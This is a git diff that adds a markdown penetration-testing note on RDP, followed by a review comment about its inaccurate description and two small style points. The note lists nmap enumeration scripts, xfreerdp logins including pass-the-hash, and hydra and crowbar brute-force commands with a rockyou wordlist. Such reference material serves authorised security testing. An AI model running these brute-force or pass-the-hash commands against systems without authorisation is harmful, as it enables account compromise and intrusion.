diff --git a/src/content/notes/network/rdp.md b/src/content/notes/network/rdp.md new file mode 100644 index 0000000..4131e69 --- /dev/null +++ b/src/content/notes/network/rdp.md @@ -0,0 +1,46 @@ +--- +title: "RDP" +description: "Enumeration, exploitation and post-exploitation techniques for RDP servers." +tags: ["rdp", "network", "service"] +publishDate: 2026-05-04 +--- + +## Overview + +RDP (Remote Desktop Protocol) runs on **port 3389** and provides a graphical remote session. +Common on Windows servers and workstations. + +## Enumeration + +### Banner grabbing + +```bash +nmap -sV -p 3389 $IP +nmap -p 3389 --script rdp-* $IP +``` + +Key scripts: + +- `rdp-enum-encryption`: checks encryption level +- `rdp-vuln-ms12-020`: tests for MS12-020 DoS vulnerability + +## Connect + +```bash +xfreerdp /u:$user /p:$password /v:$IP +xfreerdp /u:$user /p:$password /v:$IP /cert:ignore +rdesktop $IP +``` + +Pass the hash directly (no plaintext password needed): + +```bash +xfreerdp /u:$user /pth:$hash /v:$IP +``` + +## Brute Force + +```bash +hydra -l $user -P ~/wordlists/rockyou.txt rdp://$IP +crowbar -b rdp -s $IP/32 -u $user -C ~/wordlists/rockyou.txt +```
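Review bot: the front matter in this hunk describes the note as "Enumeration, exploitation and post-exploitation techniques for RDP servers", but the body only contains Overview, Enumeration, Connect and Brute Force sections with nothing on exploitation or post-exploitation; either narrow the `description` to what the file actually covers or add the missing sections before merging. Two smaller points in the same hunk: the second `xfreerdp` line under `## Connect` adds `/cert:ignore` with no explanation, so a one-line comment that it skips TLS certificate validation (typically needed only for a self-signed certificate, and a certificate that changes unexpectedly on a known host should be noticed rather than ignored) would help the reader, and `~/wordlists/rockyou.txt` in the `## Brute Force` block is a hard-coded local path where the rest of the file consistently uses variables such as `$IP` and `$user`, so a `$wordlist` variable would match the file's own convention.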